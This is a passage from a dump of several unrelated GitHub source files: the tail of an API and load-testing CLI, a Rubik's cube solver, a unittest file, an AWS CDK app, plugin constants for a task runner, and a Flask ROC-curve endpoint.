[options] [ApiRunClass [ApiRunClass2 ... ]]\")\n\n parser.add_option(\n '-f', '--testcasefile',\n dest='testcasefile',\n help=\"Testcase to run, e.g. '../testcase.xls'.\"\n )\n\n parser.add_option(\n '-F', '--testcasefolder',\n dest='testcasefolder',\n help=\"all testcase in the foler to run.\",\n default=\"\"\n )\n\n parser.add_option(\n '--report',\n action='store',\n type='str',\n dest='report',\n default='report',\n help=\"Store the reports.\",\n )\n\n # Version number (optparse gives you --version but we have to do it\n # ourselves to get -V too. sigh)\n parser.add_option(\n '-V', '--version',\n action='store_true',\n dest='show_version',\n default=False,\n help=\"show program's version number and exit\"\n )\n\n parser.add_option(\n '--demo',\n action='store_true',\n dest='make_demo',\n default=False,\n help=\"make demo xls in working folder\"\n )\n\n parser.add_option(\n '--email',\n action='store_true',\n dest='email',\n default=False,\n help='sending email after finishing api test'\n )\n\n parser.add_option(\n '--from',\n action='store_true',\n dest='email_from',\n default=False,\n help='the user who sends email'\n )\n\n parser.add_option(\n '--to',\n action='store_true',\n dest='email_to',\n default=False,\n help='the user(s) who receive email'\n )\n\n parser.add_option(\n '--subject',\n action='store_true',\n dest='email_subject',\n default=False,\n help='the email subject'\n )\n\n parser.add_option(\n '--host',\n action='store_true',\n dest='email_host',\n default=False,\n help='the email host'\n )\n\n parser.add_option(\n '--pt', '--pressuretest',\n dest='PtFile',\n help='run pressure test according to the xls, supported by locustio'\n )\n\n parser.add_option(\n '--pt-demo',\n action='store_true',\n dest='PtDemo',\n default=False,\n help='make PT demo file in current folder'\n )\n\n parser.add_option(\n '--pt-not-run',\n dest='PtNotRun',\n help='just make locustfile according to the xls'\n )\n\n parser.add_option(\n '--master',\n action='store_true',\n default=False,\n dest='master',\n help='Set locust to run in distributed mode with this process as master, use this parameter with --pt'\n )\n\n # Finalize\n # Return three-tuple of parser + the output from parse_args (opt obj, args)\n opts, args = parser.parse_args()\n return parser, opts, args\n\n\ndef run_test(title, filename, report_path, description, testcase):\n test = unittest.TestLoader().loadTestsFromTestCase(testcase)\n suit = unittest.TestSuite([test])\n runner, fp = html_report(title=title, filename=filename, report_path=report_path, description=description)\n results = runner.run(suit)\n fp.close()\n e = results.error_count\n f = results.failure_count\n s = results.success_count\n add_success(s)\n add_failure(f)\n add_error(e)\n\n\ndef get_apirun_path():\n if 'win' in sys.platform:\n python3_path = os.getenv('PYTHON')\n if not python3_path:\n python3_path = os.getenv('PYTHON3')\n if python3_path:\n if 'python3' in python3_path.lower():\n if 'scripts' in python3_path.lower():\n apirun_path = os.path.join(os.path.dirname(os.path.dirname(python3_path)), 'Lib\\\\site-packages\\\\apirun\\\\')\n else:\n apirun_path = os.path.join(python3_path, 'Lib\\\\site-packages\\\\apirun\\\\')\n else:\n sys_path = os.getenv('path').split(';')\n for each in sys_path:\n if 'python3' in each.lower() and 'scripts' not in each.lower():\n python3_path = each\n break\n apirun_path = os.path.join(python3_path, 'Lib\\\\site-packages\\\\apirun\\\\')\n elif 'linux' in sys.platform:\n with os.popen('find /usr/local/ -name apirun -type d') as lp:\n 
apirun_path = lp.read().strip()\n    return apirun_path\n\n\ndef str_to_json(data):\n    # naive conversion: assumes the Excel cell uses single quotes and none appear inside values\n    data = str(data).replace('\\'', '\"')\n    j = json.loads(data)  # the encoding kwarg was removed in Python 3.9; json.loads takes str directly\n    return j\n\n\ndef start_test(testcasefile):\n    testcase_data = HandleExcel(testcasefile)\n\n    token_url, token_body, token_para, token_locate = testcase_data.auth_info()\n    token_body = str_to_json(token_body)\n    try:\n        token = get_token(token_url, token_body, token_locate)\n    except KeyError:\n        logger.error('Please check your auth info, cannot get correct response.')\n        sys.exit(1)\n    except Exception as e:\n        logger.error('{}'.format(e))\n        sys.exit(1)\n    global headers\n    headers[token_para] = token\n\n    testcase_list = testcase_data.testcase_list()\n    report_title, report_description = testcase_data.report_info()\n\n    @ddt.ddt\n    class ApiRun(unittest.TestCase):\n\n        @classmethod\n        def setUpClass(cls):\n            cls.headers = headers\n\n        @classmethod\n        def tearDownClass(cls):\n            pass\n\n        @ddt.idata(testcase_list)\n        @ddt.unpack\n        def test_api(self, title, url, auth, method, query, request_data, expect_status, expect_str):\n            print('用例标题:' + title + 'END')  # do not delete this print: the HTML report builder regex-matches it to pick up the case title\n            method = method.upper()\n            if query:\n                query = str_to_json(query)\n            if request_data:\n                request_body = str_to_json(request_data)\n            else:\n                request_body = None\n            exp_status_code = int(expect_status)\n\n            _headers = self.headers\n            if str(auth) == '0' or auth == 'FALSE':\n                _headers = {\"Content-Type\": \"application/json\"}\n\n            if method == 'GET':  # GET\n                response_actual = requests.get(url=url, headers=_headers, params=query, verify=False)\n            elif method == 'POST':  # POST\n                response_actual = requests.post(url=url, headers=_headers, json=request_body, params=query, verify=False)\n            elif method == 'DELETE':  # DELETE\n                response_actual = requests.delete(url=url, headers=_headers, params=query, verify=False)\n            elif method == 'PUT':  # PUT\n                response_actual = requests.put(url=url, headers=_headers, params=query, json=request_body, verify=False)\n            elif method == 'PATCH':  # PATCH\n                response_actual = requests.patch(url=url, headers=_headers, params=query, json=request_body, verify=False)\n            elif method == 'HEAD':\n                response_actual = requests.head(url=url, headers=_headers, params=query, verify=False)\n            elif method == 'OPTIONS':\n                response_actual = requests.options(url=url, headers=_headers, params=query, verify=False)\n            else:  # Other method, such as TRACE\n                response_actual = requests.request(method=method, url=url, headers=_headers, params=query, json=request_body, verify=False)\n\n            actual_status_code = int(response_actual.status_code)\n            if actual_status_code == exp_status_code:\n                print('Status code is same: {sc}'.format(sc=actual_status_code))\n                if expect_str:\n                    expect_str = expect_str.strip()\n                    act_response = response_actual.json()\n                    print('Actual response: {}'.format(act_response))\n                    # expected substrings may be separated by ASCII ';' or full-width ';'\n                    if expect_str.endswith(';'):\n                        expect_str = expect_str.strip(';')\n                    if expect_str.endswith(';'):\n                        expect_str = expect_str.strip(';')\n                    if (';' not in expect_str) and (';' not in expect_str):\n                        self.assertIn(expect_str, str(act_response), msg='{} is not in response'.format(expect_str))\n                    else:\n                        if ';' in expect_str:\n                            expect_str_list = expect_str.split(';')\n                        else:\n                            expect_str_list = expect_str.split(';')\n                        for each_str in expect_str_list:\n                            each_str = each_str.strip()\n                            self.assertIn(each_str, str(act_response), msg='{} is not in response'.format(each_str))\n            else:\n                try:\n                    act_response = response_actual.json()\n                    print('Actual response: {}'.format(act_response))\n                except JSONDecodeError:\n                    
act_response = response_actual.text\n print('Not json response: {}'.format(act_response))\n self.fail('Status code is different! Actual code is {}'.format(actual_status_code))\n\n report_filename = testcasefile.replace('\\\\', '-')\n run_test(title=report_title, filename=report_filename, report_path=report_dir, description=report_description,\n testcase=ApiRun)\n\n\ndef pt_slave(ip, username, password, ptfile, ptcommand):\n connect = ConnectSlave(ip, username, password)\n is_locust = connect.check_locust()\n if is_locust:\n dest = '/root/' + ptfile\n connect.trans_file(source=ptfile, dest=dest)\n connect.remote_command(command=ptcommand)\n else:\n logging.error('Slave {} cannot run locust.'.format(ip))\n\n\ndef main():\n parser, options, arguments = parse_options()\n\n # setup logging\n # logger = logging.getLogger(__name__)\n apirun_path = get_apirun_path()\n pwd = os.getcwd()\n _run = False\n _email_mark = False\n\n if options.show_version:\n print(\"Apirun %s\" % (version,))\n sys.exit(0)\n\n if options.make_demo:\n if not apirun_path:\n logger.error('''Cannot locate Python path, make sure it is in right place. If windows add it to sys PATH,\n if linux make sure python is installed in /usr/local/lib/''')\n sys.exit(1)\n demo_path = os.path.join(apirun_path, 'demo', 'demo_testcase.xls')\n new_demo = os.path.join(pwd, 'demo.xls')\n shutil.copyfile(demo_path, new_demo)\n sys.exit(0)\n\n if options.PtDemo:\n if not apirun_path:\n logger.error('''Cannot locate Python path, make sure it is in right place. If windows add it to sys PATH,\n if linux make sure python is installed in /usr/local/lib/''')\n sys.exit(1)\n pt_demo_path = os.path.join(apirun_path, 'demo', 'demo_pressuretest.xls')\n pt_new_demo = os.path.join(pwd, 'PtDemo.xls')\n shutil.copyfile(pt_demo_path, pt_new_demo)\n sys.exit(0)\n\n if options.email:\n global yag, email_to, subject\n _email = []\n if not (options.email_from and options.email_to):\n if not os.path.isfile('email.json'):\n logger.error('It is your first time to use email function, please fill email.json and run it again.')\n demo_email = os.path.join(apirun_path, 'demo', 'email.json')\n new_email = os.path.join(pwd, 'email.json')\n shutil.copyfile(demo_email, new_email)\n sys.exit(0)\n else:\n with open('email.json', 'r') as ef:\n email_info = json.load(ef)\n email_from = email_info['from']\n subject = email_info['subject']\n if subject == '': subject = 'API Test Result'\n receivers = email_info['receiver']\n email_to = []\n for _e in receivers.keys():\n email_to.extend(receivers[_e])\n email_host = email_info['host']\n if options.email_host:\n email_host = options.email_host\n if options.email_from:\n email_from = options.email_from\n if options.email_to:\n _to = options.email_to\n if _to in receivers.keys():\n email_to = receivers[_to]\n else:\n email_to = email_in_cil(_to)\n if options.email_subject:\n subject = options.email_subject\n else:\n email_from = options.email_from\n email_to = options.email_to\n email_host = options.email_host\n if options.email_subject: subject = options.email_subject\n else: subject = 'API Test Result'\n\n _email.append(email_from)\n _email.extend(email_to)\n for _each in _email:\n if check_address(_each): pass\n else:\n logger.error('Email address is not correct: {}'.format(_each))\n sys.exit(1)\n\n yag = init_email(username=email_from, host=email_host)\n _email_mark = True\n\n if options.email_from:\n if not options.email:\n logger.error('Cannot use --from without --email.')\n sys.exit(1)\n\n if options.email_to:\n if not 
options.email:\n logger.error('Cannot use --to without --email.')\n sys.exit(1)\n\n if options.email_host:\n if not options.email:\n logger.error('Cannot use --host without --email.')\n sys.exit(1)\n\n if options.email_subject:\n if not options.email:\n logger.error('Cannot use --subject without --email.')\n sys.exit(1)\n\n if options.master:\n if not options.PtFile:\n logger.error('Cannot use --master without --pt.')\n sys.exit(1)\n\n if options.report:\n global report_dir\n report_dir = options.report\n if not apirun_path:\n logger.error('''Cannot locate Python path, make sure it is in right place. If windows add it to sys PATH,\n if linux make sure python is installed in /usr/local/lib/''')\n sys.exit(1)\n try:\n os.makedirs(os.path.join(report_dir, 'js'))\n js_file = os.path.join(apirun_path, 'js', 'echarts.common.min.js')\n shutil.copyfile(js_file, os.path.join(report_dir, 'js', 'echarts.common.min.js'))\n except FileExistsError:\n pass\n\n if options.testcasefile:\n if options.testcasefolder:\n logger.error('Cannot use -f and -F together.')\n sys.exit(1)\n testcasefile = options.testcasefile\n if not testcasefile.endswith('.xls'):\n logger.error(\"Testcasefile must be end with '.xls' and see --help for available options.\")\n sys.exit(1)\n if not os.path.isfile(testcasefile):\n logger.error('Testcasefile is not exist, please check it.')\n sys.exit(1)\n\n start_test(testcasefile=testcasefile)\n _run = True\n\n if options.testcasefolder:\n if options.testcasefile:\n logger.error('Cannot use -f and -F together.')\n sys.exit(1)\n testcase_folder = options.testcasefolder\n if testcase_folder:\n if not os.path.isdir(testcase_folder):\n logger.error('Testcasefolder is not exist, please check it.')\n sys.exit(1)\n _dir, _subdir, files = list(os.walk(testcase_folder))[0]\n else:\n _dir, _subdir, files = list(os.walk(os.getcwd()))[0]\n testcase_file_list = []\n for each in files:\n if each.endswith('.xls'):\n testcase_file_list.append(os.path.join(testcase_folder, each))\n if len(testcase_file_list) == 0:\n logger.error('There is no testcase file in Testcasefolder.')\n sys.exit(1)\n for testcasefile in testcase_file_list:\n t = Thread(target=start_test, args=(testcasefile,))\n print(t)\n print('+++++++++++++++ ' + testcasefile)\n t.start()\n t.join()\n _run = True\n\n if options.PtNotRun:\n if options.PtFile:\n logger.error('Cannot use --pt and --pt-not-run together.')\n sys.exit(1)\n pt_file = options.PtNotRun\n if not pt_file.endswith('.xls'):\n logger.error(\"PressureTest file must be end with '.xls' and see --help for available options.\")\n sys.exit(1)\n if not os.path.isfile(pt_file):\n logger.error('PressureTest file is not exist, please check it.')\n sys.exit(1)\n make_locustfile(pt_file)\n logger.info('Generate locustfile success.')\n sys.exit(0)\n\n if options.PtFile:\n if options.PtNotRun:\n logger.error('Cannot use --pt and --pt-not-run together.')\n sys.exit(1)\n pt_file = options.PtFile\n if not pt_file.endswith('.xls'):\n logger.error(\"PressureTest file must be end with '.xls' and see --help for available options.\")\n sys.exit(1)\n if not os.path.isfile(pt_file):\n logger.error('PressureTest file is not exist, please check it.')\n sys.exit(1)\n global _run_pt\n _run_pt = False\n make_locustfile(pt_file)\n ptpy = pt_file.replace('.xls', '.py')\n pt_report = pt_file.strip('.xls')\n if not options.master:\n locust_cli = 'locust -f {locustfile} --csv={ptReport}'.format(locustfile=ptpy, ptReport=pt_report)\n try:\n os.system(locust_cli)\n except KeyboardInterrupt:\n 
shutil.move(pt_report+'_distribution.csv', os.path.join(report_dir, pt_report+'_distribution.csv'))\n shutil.move(pt_report+'_requests.csv', os.path.join(report_dir, pt_report+'_requests.csv'))\n _run_pt = True\n else:\n pt_s = PtExcel(pt_file)\n master_ip, pt_slave_info = pt_s.pt_slave()\n if master_ip == '':\n logger.error('master IP cannot be None if you use --master')\n sys.exit(1)\n if 'win' in sys.platform.lower():\n locust_cli_master = 'locust -f {locustfile} --csv={ptReport} --master'.format(locustfile=ptpy, ptReport=pt_report)\n else:\n locust_cli_master = 'locust -f {locustfile} --csv={ptReport} --master'.format(locustfile=ptpy, ptReport=pt_report)\n try:\n locust_cli_slave = 'nohup locust -f /root/{locustfile} --slave --master-host={masteIP} > /dev/null 2>&1 &'.format(locustfile=ptpy, masteIP=master_ip)\n for slave in pt_slave_info:\n slave_ip, slave_username, slave_password = slave\n _t = Thread(target=pt_slave, args=(slave_ip, slave_username, slave_password, ptpy, locust_cli_slave))\n logger.info('Prepare slave {}'.format(slave_ip))\n _t.start()\n _t.join()\n os.system(locust_cli_master)\n except KeyboardInterrupt:\n pass\n except Exception as e:\n logger.error('Must someting happend, collect Exceptions here: {}'.format(e))\n finally:\n shutil.move(pt_report + '_distribution.csv', os.path.join(report_dir, pt_report + '_distribution.csv'))\n shutil.move(pt_report + '_requests.csv', os.path.join(report_dir, pt_report + '_requests.csv'))\n _run_pt = True\n\n if _run or _run_pt:\n if _run:\n print('==================')\n results_message = '''\n Results:\n Total: {t}\n Success: {s}\n Failure: {f}\n Error: {e}\n '''.format(t=(_success + _failure + _error), s=_success, f=_failure, e=_error)\n print(results_message)\n else:\n results_message = 'Pressure Test Result.'\n\n if _email_mark:\n attachment = subject.replace(' ', '_') + '.zip'\n zip_report(report_dir, attachment)\n send_email(yag, subject=subject, to=email_to, msg=results_message, attachment=attachment)\n else:\n sys.exit(0)\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"GuoTengda1993/apirun","sub_path":"apirun/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29751732257","text":"#!/usr/bin/env python3\n\n\"\"\"\nSolve any size rubiks cube:\n- For 2x2x2 and 3x3x3 just solve it\n- For 4x4x4 and larger, reduce to 3x3x3 and then solve\n\"\"\"\n\n# standard libraries\nimport argparse\nimport datetime as dt\nimport logging\nimport resource\nimport sys\nfrom math import sqrt\n\n# rubiks cube libraries\nfrom rubikscubennnsolver import SolveError, configure_logging, reverse_steps\n\nif sys.version_info < (3, 6):\n raise SystemError(\"Must be using Python 3.6 or higher\")\n\nconfigure_logging()\nlogger = logging.getLogger(__name__)\n\nlogger.info(\"rubiks-cube-solver.py begin\")\n\nstart_time = dt.datetime.now()\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--print-steps\", default=False, action=\"store_true\", help=\"Display animated step-by-step solution\")\nparser.add_argument(\"--debug\", default=False, action=\"store_true\", help=\"set loglevel to DEBUG\")\nparser.add_argument(\"--no-comments\", default=False, action=\"store_true\", help=\"No comments in alg.cubing.net url\")\n\n# CPU mode\nparser.add_argument(\n \"--min-memory\",\n default=False,\n action=\"store_true\",\n help=\"Load smaller tables to use less memory...takes longer to run\",\n)\n\naction = 
parser.add_mutually_exclusive_group(required=False)\nparser.add_argument(\"--openwith\", default=None, type=str, help=\"Colors for sides U, L, etc\")\nparser.add_argument(\"--colormap\", default=None, type=str, help=\"Colors for sides U, L, etc\")\nparser.add_argument(\"--order\", type=str, default=\"URFDLB\", help=\"order of sides in --state, default kociemba URFDLB\")\nparser.add_argument(\"--solution333\", type=str, default=None, help=\"cube explorer optimal steps for solving 3x3x3\")\nparser.add_argument(\n \"--state\",\n type=str,\n help=\"Cube state\",\n default=\"LBBUUURBDDBBDFLFLUDFBFDDFLLLLRLRFRDUDBULBLFLDLFBLBUDFURURDUUBFFBBRBRLBRFLLDRRDDFRRUURRFDUFBFURUD\",\n)\n\nargs = parser.parse_args()\n\nif \"G\" in args.state:\n args.state = args.state.replace(\"G\", \"F\")\n args.state = args.state.replace(\"Y\", \"D\")\n args.state = args.state.replace(\"O\", \"L\")\n args.state = args.state.replace(\"W\", \"U\")\n\nif args.debug:\n logger.setLevel(logging.DEBUG)\n\nsize = int(sqrt((len(args.state) / 6)))\n\nif size == 2:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube222 import RubiksCube222\n\n cube = RubiksCube222(args.state, args.order, args.colormap)\nelif size == 3:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube333 import RubiksCube333\n\n cube = RubiksCube333(args.state, args.order, args.colormap)\nelif size == 4:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube444 import RubiksCube444\n\n cube = RubiksCube444(args.state, args.order, args.colormap)\nelif size == 5:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube555 import RubiksCube555\n\n cube = RubiksCube555(args.state, args.order, args.colormap)\nelif size == 6:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube666 import RubiksCube666\n\n cube = RubiksCube666(args.state, args.order, args.colormap)\nelif size == 7:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube777 import RubiksCube777\n\n cube = RubiksCube777(args.state, args.order, args.colormap)\nelif size % 2 == 0:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCubeNNNEven import RubiksCubeNNNEven\n\n cube = RubiksCubeNNNEven(args.state, args.order, args.colormap)\nelse:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCubeNNNOdd import RubiksCubeNNNOdd\n\n cube = RubiksCubeNNNOdd(args.state, args.order, args.colormap)\n\ncube.sanity_check()\ncube.print_cube(\"Initial Cube\")\ncube.www_header()\ncube.www_write_cube(\"Initial Cube\")\n\nif args.openwith:\n for step in args.openwith.split():\n cube.rotate(step)\n cube.print_cube(\"post --openwith\")\n\nif args.solution333:\n solution333 = reverse_steps(args.solution333.split())\nelse:\n solution333 = []\n\ncube.solve(solution333)\nend_time = dt.datetime.now()\ncube.print_cube(\"Final Cube\")\ncube.print_solution(not args.no_comments)\n\nlogger.info(\"*********************************************************************************\")\nlogger.info(\"See /tmp/rubiks-cube-NxNxN-solver/index.html for more detailed solve instructions\")\nlogger.info(\"*********************************************************************************\\n\")\n\n# Now put the cube back in its initial state and verify the solution solves it\nsolution = cube.solution\ncube.re_init()\nlen_steps = len(solution)\n\nfor i, step in enumerate(solution):\n if args.print_steps:\n print((\"Move %d/%d: %s\" % (i + 1, len_steps, step)))\n\n cube.rotate(step)\n\n www_desc = \"Cube After Move %d/%d: %s
\\n\" % (i + 1, len_steps, step)\n cube.www_write_cube(www_desc)\n\n if args.print_steps:\n cube.print_cube(f\"--print-steps {step}\")\n print(\"\\n\\n\\n\\n\")\n\ncube.www_footer()\n\nif args.print_steps:\n cube.print_cube(\"--print-steps DONE\")\n\nif args.min_memory:\n print(\"\\n\\n****************************************\")\n print(\"--min-memory has been replaced by --fast\")\n print(\"****************************************\\n\\n\")\n\nlogger.info(\"rubiks-cube-solver.py end\")\nlogger.info(f\"Memory : {resource.getrusage(resource.RUSAGE_SELF).ru_maxrss:,} bytes\")\nlogger.info(f\"Time : {end_time - start_time}\")\nlogger.info(\"\")\n\nif not cube.solved():\n raise SolveError(\"cube should be solved but is not\")\n","repo_name":"dwalton76/rubiks-cube-NxNxN-solver","sub_path":"rubiks-cube-solver.py","file_name":"rubiks-cube-solver.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"53"} +{"seq_id":"5378844626","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom graph.flower_planting import FlowerPlanting\n\nclass TestFlowerPlanting(unittest.TestCase):\n def setUp(self):\n self.func = FlowerPlanting().gardenNoAdj\n\n def test_1(self):\n N, paths = 3, [[1,2],[2,3],[3,1]]\n expected = [[1,3,2],[1,2,3]]\n self.assertTrue(self.func(N, paths) in expected)\n\n def test_2(self):\n N, paths = 4, [[1,2],[3,4]]\n expected = [[1,2,1,2]]\n self.assertTrue(self.func(N, paths) in expected)\n\n def test_3(self):\n N, paths = 4, [[1,2],[2,3],[3,4],[4,1],[1,3],[2,4]]\n expected = [[1,4,2,3],[1,2,3,4]]\n self.assertTrue(self.func(N, paths) in expected)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/graph_test/test_flower_planting.py","file_name":"test_flower_planting.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26324440852","text":"#!/usr/bin/env python3\nimport os\n\nfrom aws_cdk import App, Aspects, Tags\nfrom cdk_nag import AwsSolutionsChecks\n\nfrom src.AL2_mate_image_builder_pipeline import Al2MateImagebuilderPipeline\nfrom src.s3_ops import S3Ops\nfrom src.Ubuntu_mate_image_builder_pipeline import UbuntuMateImagebuilderPipeline\n\napp = App()\ns3_ops_stack = S3Ops(app, \"S3Ops\")\nal2_mate_image_builder_stack = Al2MateImagebuilderPipeline(\n app,\n \"Al2MateImagebuilderPipeline\",\n env={\n \"account\": os.environ[\"CDK_DEFAULT_ACCOUNT\"],\n \"region\": os.environ[\"CDK_DEFAULT_REGION\"],\n },\n)\n\nubuntu_mate_image_builder_stack = UbuntuMateImagebuilderPipeline(\n app,\n \"UbuntuImagebuilderPipeline\",\n env={\n \"account\": os.environ[\"CDK_DEFAULT_ACCOUNT\"],\n \"region\": os.environ[\"CDK_DEFAULT_REGION\"],\n },\n)\n\nal2_mate_image_builder_stack.add_dependency(s3_ops_stack)\nubuntu_mate_image_builder_stack.add_dependency(s3_ops_stack)\n\nfor tag_key, tag_value in app.node.try_get_context(\"resource_tags\").items():\n Tags.of(app).add(tag_key, tag_value)\n\n\nAspects.of(app).add(AwsSolutionsChecks())\napp.synth()\n","repo_name":"HicResearch/treehoose-ec2-builder","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25574108388","text":"# Put this at the top of your kata01.py file \nkata = {\n'Python': 'Guido van 
Rossum',\n'Ruby': 'Yukihiro Matsumoto',\n'PHP': 'Rasmus Lerdorf'\n}\n\nfor k,v in kata.items():\n print(k, \"was created by\", v)\n\n","repo_name":"Neilus03/42-Python","sub_path":"Modulo_00/ex05/kata01.py","file_name":"kata01.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17012798721","text":"##-- std imports\nfrom __future__ import annotations\n\n# import datetime\n# import enum\nimport pathlib as pl\nimport types\n# from copy import deepcopy\n# from dataclasses import InitVar, dataclass, field\nfrom typing import (TYPE_CHECKING, Any, Callable, ClassVar, Final, Generic,\n Iterable, Iterator, Mapping, Match, MutableMapping,\n Protocol, Sequence, Tuple, TypeAlias, TypeGuard, TypeVar,\n cast, final, overload, runtime_checkable)\nfrom importlib import resources\n##-- end std imports\n\n##-- plugin names and loaders\nPLUGIN_TOML_PREFIX : Final = \"doot.plugins\" # (project.entry-points.\"doot.plugins\")\nFRONTEND_PLUGIN_TYPES : Final = ['command', 'reporter', 'report-line']\nBACKEND_PLUGIN_TYPES : Final = [\n 'database', 'tracker', 'runner',\n 'command-loader', 'task-loader',\n 'parser', 'action', \"tasker\"\n ]\n\nDEFAULT_COMMAND_LOADER_KEY : Final[str] = \"command-loader\"\n\nDEFAULT_TASK_LOADER_KEY : Final[str] = \"task-loader\"\n\nDEFAULT_PLUGIN_LOADER_KEY : Final[str] = \"plugin-loader\"\n##-- end plugin names and loaders\n\n##-- default plugins\n# Loaded in doot.loaders.plugin_loader\n# as pairs (name, import_path)\n\nDEFAULT_PLUGINS = {}\n\nDEFAULT_PLUGINS['command'] = [(\"help\" , \"doot.cmds.help_cmd:HelpCmd\") ,\n (\"run\" , \"doot.cmds.run_cmd:RunCmd\") ,\n (\"list\" , \"doot.cmds.list_cmd:ListCmd\") ,\n (\"clean\" , \"doot.cmds.clean_cmd:CleanCmd\") ,\n (\"complete\" , \"doot.cmds.complete_cmd:CompleteCmd\") ,\n # (\"serve\" , \"doot.cmds.server_cmd:ServerCmd\") ,\n (\"daemon\" , \"doot.cmds.daemon_cmd:DaemonCmd\") ,\n (\"stub\" , \"doot.cmds.stub_cmd:StubCmd\") ,\n (\"step\" , \"doot.cmds.step_cmd:StepCmd\") ,\n (\"plugins\" , \"doot.cmds.plugins_cmd:PluginsCmd\") ,\n (\"locs\" , \"doot.cmds.locs_cmd:LocsCmd\") ,\n ]\n\nDEFAULT_PLUGINS['reporter'] = [(\"summary\", \"doot.reporters.summary_manager:DootReportManagerSummary\"),\n (\"stack\", \"doot.reporters.stack_manager:DootReportManagerStack\")\n ]\nDEFAULT_PLUGINS['report-line'] = [(\"basic\", \"doot.reporters.basic_reporters:DootAlwaysReport\"),\n (\"time\", \"doot.reporters.basic_reporters:TimerReporter\")\n ]\nDEFAULT_PLUGINS['database'] = []\n\nDEFAULT_PLUGINS['tracker'] = [(\"basic\", \"doot.control.tracker:DootTracker\")]\n\nDEFAULT_PLUGINS['runner'] = [(\"basic\", \"doot.control.runner:DootRunner\")]\n\nDEFAULT_PLUGINS['parser'] = [(\"basic\", \"doot.parsers.parser:DootArgParser\")]\n\nDEFAULT_PLUGINS['action'] = [(\"basic\" , \"doot.actions.base_action:DootBaseAction\"),\n (\"shell\" , \"doot.actions.shell_action:DootShellAction\"),\n ]\n\nDEFAULT_PLUGINS['tasker'] = [(\"tasker\" , \"doot.task.base_tasker:DootTasker\"),\n (\"globber\" , \"doot.task.globber:DootEagerGlobber\"),\n (\"task\" , \"doot.task.base_task:DootTask\"),\n ]\n\n##-- end default plugins\n\n##-- path and file names\nTEMPLATE_PATH : Final[pl.Path] = resources.files(\"doot.__templates\")\nTOML_TEMPLATE : Final[pl.Path] = TEMPLATE_PATH / \"basic_toml\"\nDOOTER_TEMPLATE : Final[pl.Path] = TEMPLATE_PATH / \"dooter\"\n\nDEFAULT_DOOTER : Final[pl.Path] = pl.Path(\"dooter.py\")\n\nDEFAULT_LOAD_TARGETS : Final[list[pl.Path]] = [pl.Path(x) for x in 
[\"doot.toml\", \"pyproject.toml\", \"Cargo.toml\", \"./.cargo/config.toml\"]]\n\nDEFAULT_STUB_TASK_NAME : Final[str] = \"stub::stub\"\n\n##-- end path and file names\n\nTASK_SEP = \"::\"\nIMPORT_SEP = \":\"\nSUBTASKED_HEAD = \"$head$\"\n\nDEFAULT_CLI_CMD : Final[str] = \"run\"\n\nDEFAULT_TASK_PREFIX : Final[str] = \"task_\"\n\nDEFAULT_TASK_GROUP : Final[str] = \"default\"\n\nANNOUNCE_EXIT : Final[bool] = False\n\nANNOUNCE_VOICE : Final[str] = \"Moira\"\n\nPRINTER_NAME : Final[str] = \"doot._printer\"\n","repo_name":"jgrey4296/doot","sub_path":"doot/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10219397401","text":"from flask import Flask\nfrom flask_restful import Resource, Api\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_curve, roc_auc_score\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\nimport pandas as pd\nimport numpy as np\nimport json\nimport math\n\napp = Flask(__name__)\napi = Api(app)\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')\n response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n return response\n\n@app.route('/', methods=['GET'])\ndef index():\n return 'Hello, World!'\n\n@app.route('/roc//', methods=['GET'])\ndef roc(preprocessing, c):\n df = pd.read_csv('data/transfusion.data')\n xDf = df.loc[:, df.columns != 'Donated']\n y = df['Donated']\n\n # get random numbers to split into train and test\n np.random.seed(1)\n r = np.random.rand(len(df))\n\n # split into train test\n X_train = xDf[r < 0.8]\n X_test = xDf[r >= 0.8]\n y_train = y[r < 0.8]\n y_test = y[r >= 0.8]\n\n #Standardization\n scaler = StandardScaler()\n if preprocessing == \"standard\":\n \tscaler = StandardScaler()\n if preprocessing == \"normalization\":\n scaler = MinMaxScaler()\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n \n #Logistic Regression\n LR = LogisticRegression(C= float(c), random_state=0, solver='lbfgs')\n LR.fit(X_train, y_train)\n probs = LR.predict_proba(X_test)\n fprs, tprs, thresholds = roc_curve(y_test, probs[:,1], pos_label=1)\n score = roc_auc_score(y_test, probs[:,1])\n\n # Return a list of dictionaries\n dicts = []\n for i in range(len(fprs)):\n dicts.append({\"fpr\":round(fprs[i], 4),\"tpr\":round(tprs[i], 4), \"threshold\": thresholds[i], \"score\": round(score, 4)})\n return json.dumps(dicts, 